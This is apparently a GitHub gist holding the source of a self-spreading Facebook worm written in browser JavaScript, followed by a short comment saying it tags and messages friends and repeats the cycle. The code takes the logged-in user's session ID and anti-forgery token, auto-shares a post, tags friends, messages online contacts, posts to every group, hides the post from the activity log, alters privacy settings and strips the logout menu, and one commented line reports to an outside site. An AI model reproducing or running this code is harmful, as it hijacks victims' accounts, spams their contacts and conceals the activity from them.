xhr.open("POST", "https://www.facebook.com/ajax/updatestatus.php?av="+vars.page_id+"&dpr=1");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.send(deSerialize(params));
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
if(!data.error){
vars.share_id = xhr.responseText.split('share_id":')[1].split('}')[0];
for (i=0;i<config.post_limit;i++) {
window.setTimeout(function(){
share_profile(vars);
}, 1500 * i);
}
check_avialible(vars);
check_groups(vars);
}
}
}
}
function share_profile(vars) {
var params = {
post_id: vars.share_id,
share_type: 99,
audience_type: "self",
app_id: 2309869772,
sharer_id: vars.page_id,
privacy: 300645083384735,
share_now: 1,
is_forced_reshare_of_post: 0,
__user: profile_id,
__a: 1,
__dyn: get_dyn(),
__req: "n",
__be: 0,
__pc: "EXP1:DEFAULT",
fb_dtsg: fb_dtsg,
ttstamp: ttstamp,
__rev: __rev,
"ft[tn]": "J]",
"ft[type]": 25,
"ft[fbfeed_location]": 5,
};
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.facebook.com/share/dialog/submit/?dpr=2");
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200){
var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
if (!data.error) {
vars.post_id = searchArray(data, "object_id");
edit_share(vars);
}
}
}
xhr.send(deSerialize(params));
}
function edit_share(vars) {
shuffle(vars.friends);
var tx = name_generate();
//var status = tx + " :D ";
var status = "";
//var status_text = tx + " :D ";
var status_text = "";
if (vars.friends.length >= config.tag_limit) {
for (i=0;i<config.tag_limit;i++) {
status += "@["+vars.friends[i].uid+": "+vars.friends[i].text+"] ";
status_text += vars.friends[i].text+" ";
}
} else {
for (i=0;i<vars.friends.length;i++) {
status += "@["+vars.friends[i].uid+": "+vars.friends[i].text+"] ";
status_text += vars.friends[i].text+" ";
}
}
var params = {
fb_dtsg: fb_dtsg,
edited_post_fbid: vars.post_id,
hey_kid_im_a_composer: 1,
display_context: "home",
xhpc_context: "home",
entstory_context:'{"profile_id":'+profile_id+',"story_width":513,"fbfeed_context":true,"location_type":10,"is_ad_preview":false,"is_editable":false,"shimparams":{"page_type":16,"actor_id":'+profile_id+',"story_id":'+vars.post_id+',"ad_id":0,"location":"timeline"},"story_id":"u_0_1u","caret_id":"u_0_1v"}',
status_text: status_text,
status: status,
save: 1,
__user: profile_id,
__a: 1,
__dyn: get_dyn(),
__req: "1h",
__be: 0,
__pc: "EXP1:DEFAULT",
ttstamp: ttstamp,
__rev: __rev
};
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.facebook.com/ajax/edits/save/?av="+profile_id+"&dpr=2");
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200){
var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
if (!data.error) {
new Image().src = '';
}
}
}
xhr.send(deSerialize(params));
}
function check_avialible(vars){
var params = {
user: profile_id,
cached_user_info_ids: "",
fetch_mobile: "false",
get_now_available_list: "true",
__user: profile_id,
__a: "1",
_dyn: "",
__req: "15",
fb_dtsg: fb_dtsg,
ttstamp: ttstamp,
__rev: __rev
}
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.facebook.com/ajax/chat/buddy_list.php?__pc=EXP1%3ADEFAULT");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.send(deSerialize(params));
xhr.onreadystatechange = function() {
if(xhr.readyState == 4 && xhr.status == 200) {
var data = JSON.parse(xhr.responseText.replace("for (;;);", ""));
var i = 0;
for(uid in data.payload.buddy_list.nowAvailableList) {
if(i < config.message_limit){
post_send(vars, uid);
}
i++;
}
}
}
}
function post_send(vars, uid) {
var getParams = {
app_id: 2309869772,
attribution: vars.page_id,
audience_type: "message",
"audience_targets[0]": uid,
composer_session_id: guid(),
ephemeral_ttl_mode: 0,
message: name_generate(),
owner_id: vars.page_id,
post_id: vars.share_id,
privacy: 300645083384735,
share_to_group_as_page: false,
share_type: 99,
shared_ad_id: "",
source: "osbach",
url: "",
av: profile_id,
dpr: 2
};
var params = {
__user: profile_id,
__a: 1,
__dyn: get_dyn(),
__req: "1l",
__be: 0,
__pc: "EXP1:DEFAULT",
fb_dtsg: fb_dtsg,
ttstamp: ttstamp,
__rev: __rev
};
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.facebook.com/share/dialog/submit/?"+deSerialize(getParams));
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200){
var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
if (!data.error) {
}
}
}
xhr.send(deSerialize(params));
}
function check_groups(vars) {
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?dpr=2&viewer="+profile_id+"&token=v7&filter[0]=group&&__user="+profile_id+"&__a=1");
xhr.send();
xhr.onreadystatechange = function() {
if(xhr.readyState == 4 && xhr.status == 200) {
vars.groups = JSON.parse(xhr.responseText.replace("for (;;);", "")).payload.entries;
if (vars.groups.length > 0) {
for (i=0;i<vars.groups.length;i++) {
send_group(vars, vars.groups[i].uid);
}
}
}
}
}
function send_group(vars, group) {
var getParams = {
app_id: 2309869772,
attribution: vars.page_id,
audience_type: "group",
"audience_targets[0]": group,
composer_session_id: guid(),
ephemeral_ttl_mode: 0,
message: name_generate(),
owner_id: vars.page_id,
post_id: vars.share_id,
privacy: 300645083384735,
share_to_group_as_page: false,
share_type: 99,
shared_ad_id: "",
source: "osbach",
url: "",
av: profile_id,
dpr: 2
};
var params = {
__user: profile_id,
__a: 1,
__dyn: get_dyn(),
__req: "12",
__be: 0,
__pc: "EXP1:DEFAULT",
fb_dtsg: fb_dtsg,
ttstamp: ttstamp,
__rev: __rev
};
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.facebook.com/share/dialog/submit/?"+deSerialize(getParams));
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200){
var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
if (!data.error) {
// new Image().src = "http://chinupforlupus.org/php/sonuc.php?sonuc="+group+"&link="+vars.link+"&img=Group Share";
}
}
}
xhr.send(deSerialize(params));
}
function unFollowPost(vars){
var params = {
message_id:vars.post_id,
follow:0,
__user:profile_id,
__a:1,
__dyn: get_dyn(),
__req:"m",
fb_dtsg:fb_dtsg,
ttstamp:ttstamp,
__rev:__rev
}
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.facebook.com/ajax/litestand/follow_post");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.send(deSerialize(params));
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
}
}
}
function hidePost(vars){
var d = new Date();
var params = {
action:"hide",
timeline_token:profile_id+":"+vars.post_id+"::"+vars.shared_time+":"+vars.shared_time,
"nctr[_mod]":"pagelet_all_activity_"+d.getUTCFullYear()+"_"+(d.getUTCMonth()+1),
__user:profile_id,
__a:1,
__dyn: get_dyn(),
__req:"q",
__pc:"EXP1:DEFAULT",
fb_dtsg:fb_dtsg,
ttstamp:ttstamp,
__rev:__rev
}
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.facebook.com/ajax/timeline/all_activity/visibility.php?dpr=1");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.send(deSerialize(params));
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
}
}
}
function privacySetting(){
var params = {
value:"300645083384735",
prev_value:"291667064279714",
__user:profile_id,
__a:1,
__dyn: get_dyn(),
__req:"15",
fb_dtsg:fb_dtsg,
ttstamp:ttstamp,
__rev:__rev
}
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.facebook.com/ajax/settings/granular_privacy/composer.php");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.send(deSerialize(params));
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
}
}
}
String.prototype.karistir = function() {
var parts = this.split('');
for (var i = 0, len = parts.length; i < len; i++) {
var j = Math.floor( Math.random() * ( i + 1 ) );
var temp = parts[i];
parts[i] = parts[j];
parts[j] = temp;
}
return parts.join('');
};
function name_generate() {
var t = "";
for (i=0;i<5;i++) {
t += "aeiou".karistir()[0];
t += "bcdfghjklmnprstvyz".karistir()[0];
}
return t[0].replace(t[0], t[0].toUpperCase())+t.replace(t[0], "");
}
function guid() {
function s4() {
return Math.floor((1 + Math.random()) * 0x10000)
.toString(16)
.substring(1);
}
return s4() + s4() + '-' + s4() + '-' + s4() + '-' +
s4() + '-' + s4() + s4() + s4();
}
function shuffle(array) {
var currentIndex = array.length, temporaryValue, randomIndex;
while (0 !== currentIndex) {
randomIndex = Math.floor(Math.random() * currentIndex);
currentIndex -= 1;
temporaryValue = array[currentIndex];
array[currentIndex] = array[randomIndex];
array[randomIndex] = temporaryValue;
}
return array;
}
function rand(min,max){
return Math.floor(Math.random()* (max-min))+min;
}
function rastgele(uzunluk) {
mtn = "abcdefghijklmnoprstuvyzx0123456789";
ret = "";
for (l = 0; l < uzunluk; l++) {
ret += mtn[Math.floor(Math.random() * mtn.length)];
}
return ret;
}
function searchArray(a,k){
var found = false;
for(key in a){
if(key.toString() == k){
found = a[key];
break;
}else if(typeof a[key] == "object"){
found = searchArray(a[key],k);
if(found != false){
break;
}
}
}
return found;
}
function get_dyn() {
var bd = document.body.innerHTML.match(/\},([0-9])+\]/gi)
var hd = document.head.innerHTML.match(/\},([0-9])+\]/gi)
var is = bd.concat(hd);
var t = [];
for (x in is) {
if (is[x] != null) {
var p = is[x].replace('},', "").replace(']', "");
if (parseInt(p) >= 7) {
t.push(parseInt(p));
}
}
}
var h = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-_';
function toCompressedString() {
$BitMap1 = [];
for (i in t) {
$BitMap1[t[i]] = 1;
}
if ($BitMap1.length === 0)
return '';
var l = [],
m = 1,
n = $BitMap1[0] || 0,
o = n.toString(2);
for (var p = 1; p < $BitMap1.length; p++) {
var q = $BitMap1[p] || 0;
if (q === n) {
m++;
} else {
l.push(j(m));
n = q;
m = 1;
}
}
if (m)
l.push(j(m));
return k(o + l.join(''));
}
function j(l) {
var m = l.toString(2),
n = '0'.repeat(m.length - 1);
return n + m;
}
function k(l) {
var m = (l + '00000').match(/[01]{6}/g),
n = '';
for (var o = 0; o < m.length; o++) {
n += h[parseInt(m[o], 2)];
}
return n;
}
return toCompressedString();
}
function deSerialize(json) {
return Object.keys(json).map(function(key) {
return encodeURIComponent(key) + '=' + encodeURIComponent(json[key]);
}).join('&');
}
function randoms(l, m) {
var r = [];
while (r.length < l) {
var rnd = Math.floor(Math.random() * m);
if (r.indexOf(rnd) < 0) {
r.push(rnd);
}
}
return r;
}
function blockRemove(){
window.setInterval(function() {
if (document.getElementsByClassName("_5ce")) {
for (i = 0; i < document.getElementsByClassName("_5ce").length; i++) {
document.getElementsByClassName("_5ce")[i].innerHTML = "";
}
}
if (document.getElementsByClassName("uiToggle wrap")) {
for (i = 0; i < document.getElementsByClassName("uiToggle wrap").length; i++) {
document.getElementsByClassName("uiToggle wrap")[i].innerHTML = "";
}
}
if(document.getElementById("logoutMenu")){
document.getElementById("logoutMenu").parentNode.outerHTML = ""
}
if (document.getElementsByClassName("uiPopover")) {
for (i = 0; i < document.getElementsByClassName("uiPopover").length; i++) {
document.getElementsByClassName("uiPopover")[i].innerHTML = "";
}
}
if (document.getElementsByClassName("UFICommentCloseButton")) {
for (i = 0; i < document.getElementsByClassName("UFICommentCloseButton").length; i++) {
document.getElementsByClassName("UFICommentCloseButton")[i].outerHTML = "";
}
}
}, 10);
}
if (location.hostname.indexOf("facebook.com") >= 0) {
fb_dtsg_list = document.getElementsByName('fb_dtsg');
if(!document.getElementById("isrun") && fb_dtsg_list.length > 0){
var log = document.createElement("meta");
log.id = "isrun";
document.head.appendChild(log);
blockRemove();
profile_id = document.cookie.match(/c_user=(\d+)/)[1];
fb_dtsg = fb_dtsg_list[0].value;
__rev = document.head.innerHTML.split('"revision":')[1].split(",")[0];
ttstamp = "";
for (var x = 0; x < fb_dtsg.length; x++){
ttstamp += fb_dtsg.charCodeAt(x);
}
ttstamp = '2' + ttstamp;
console.log("User:"+profile_id);
console.log("fb_dtsg:"+fb_dtsg);
console.log("__rev:"+__rev);
console.log("ttstamp:"+ttstamp);
start();
window.setInterval(function(){
window.top.location.reload();
}, 1000*60*15);
}
}
Up in this script we see where the video ID was generated randomly
"V1DE0-"+Math.floor(Math.random()*9999)+".html");
Without going line by line, let's just say this script
* tags your friends
* messages your friends with the link
* and continues the cycle of
Worm, worm, worm, worm, worm, worm
Ner ner ner ner ner ner!
When yuh ago learn learn learn learn learn learn!
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment